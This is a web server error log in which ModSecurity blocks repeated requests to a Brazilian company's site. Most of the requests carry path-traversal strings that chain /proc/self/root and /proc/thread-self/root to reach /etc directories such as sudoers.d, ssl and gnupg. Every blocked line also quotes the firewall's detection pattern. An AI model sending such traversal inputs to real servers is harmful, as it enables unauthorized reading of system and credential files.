[Mon Mar 16 22:03:16.811211 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:38058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abioVI6lpbStxTqkSkuXkAAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:03:20.234500 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:42760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abioWFajLEzk2WiQ-11FGwAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:03:21.522883 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:42766] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abioWc_BxrYCr4hPDw8cVwAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:03:23.751369 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:42770] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abioW_9ocpUE4ed4uDwmRQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:03:27.158195 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:42774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abioX6QpVkWug9HeOt9izAAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:03:27.532772 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.228.16:41054] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abioX0r9dMAiw-8KANN6tAAAAQw"]
[Mon Mar 16 22:03:42.373449 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.243.203:42754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiobkr9dMAiw-8KANN6wwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:03:42.658944 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.244.31:36608] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiobqTCbgAP5jq5TehcjAAAAtc"]
[Mon Mar 16 22:03:44.042462 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:59792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiocLysWC90G-1nBrB1ZAAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:03:47.514646 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:59712] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abioc7ABkC4fWIHEf8EuaAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:03:48.817115 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:39670] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiodNSswJuvopo3lOiSvQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:03:54.527112 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:39678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abioerysWC90G-1nBrB1cwAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:03:55.855319 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.241.46:39690] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abioe46lpbStxTqkSkuXnAAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:03:59.888687 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.241.46:39706] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiof46lpbStxTqkSkuXoAAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:04:01.231589 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:54062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiogbABkC4fWIHEf8EucQAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:06:06.156889 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.243.203:34090] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abio_kr9dMAiw-8KANN7DgAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:06:07.475079 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:49354] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abio_7ABkC4fWIHEf8EurwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:06:08.807413 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:49368] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipAKQpVkWug9HeOt9i9wAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:06:11.213048 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.243.203:43106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipA8_BxrYCr4hPDw8ckgAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:06:13.615391 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:43122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipBaQpVkWug9HeOt9i-gAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:06:59.802690 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:49218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipM0r9dMAiw-8KANN7QwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:03.686137 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.241.46:49218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipN0r9dMAiw-8KANN7RwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:40.583454 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:43124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipXP9ocpUE4ed4uDwnMgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
